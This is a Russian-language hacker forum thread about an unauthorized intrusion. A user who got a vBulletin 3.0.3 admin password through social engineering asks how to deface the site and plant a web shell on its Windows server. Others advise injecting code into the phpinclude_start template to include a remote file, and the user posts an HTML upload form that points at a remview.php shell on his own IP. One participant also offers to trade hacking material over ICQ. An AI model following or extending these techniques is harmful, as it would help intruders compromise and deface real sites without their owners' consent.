Я поимел поcтуп к админпанели vBulletin 3.0.3. хо4у сайт дефейснуть, дописываю в шаблоны свой код, но 4е-то он не канает... location=myip/shell.php по понятным при4инам работает с правами браузера, а сам шелл залить не могу(виндовая та4ка, wget не идет) 4то можете посоветовать?
Не надо никакой шел заливать. В щаблонах есть файл phpinclude_start туда можно вставить ссылку на внешний файл. Этого должно быть достаточно.
Нет, ЕГОРЫ4. в phpinclude_stat не канает... только просто в phpinclude. Вот вставил такой код: <FORM ENCTYPE="multipart/form-data" ACTION="http://мой айпи/remview.php" METHOD=POST> <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="1000000"> Send this file: <INPUT NAME="userfile" TYPE="file"> <INPUT TYPE="submit" VALUE="Send File"> </FORM> к сожадению нету где проверить. 4то скажете, воркать(не локально, а открываться в правами на дефейснутой та4ке) будет(я в этом дело абсолютный 0)??? 2 ЧегеВара: Да это я один портал в нешей городской локалек поимел =) А там и этот новенький форумеЦ стоит
Вообще то это можно сделать только через phpinclude_start ... не знаю как ты проверял работате он или нет, но обычно проверить можно просто вписав туда типа <? echo("12345678"); ?> после того как впишешь, это сообщение должно появиться на первой странички вверху
ProTeuS - ты это с каким форумом сделал, сэтим что-ли?=) Скажи как ты это сделал. Если не хочешь делиться забеслпатно своими достяжениями пиши в асю: 313102321, у меня много всего полезного есть, сможем договориться=)
Ну да, таким макаром на паге это выводит, я просто не знаю какой командой на этой виндовой та4ке шелл залить, или вызвать его как-то, 4тобы открыть ее диски Может поможете.... 2 Automan: ну да, vBulletin 3.0.3. И пас я расдобыл 4ичто соЦинженерией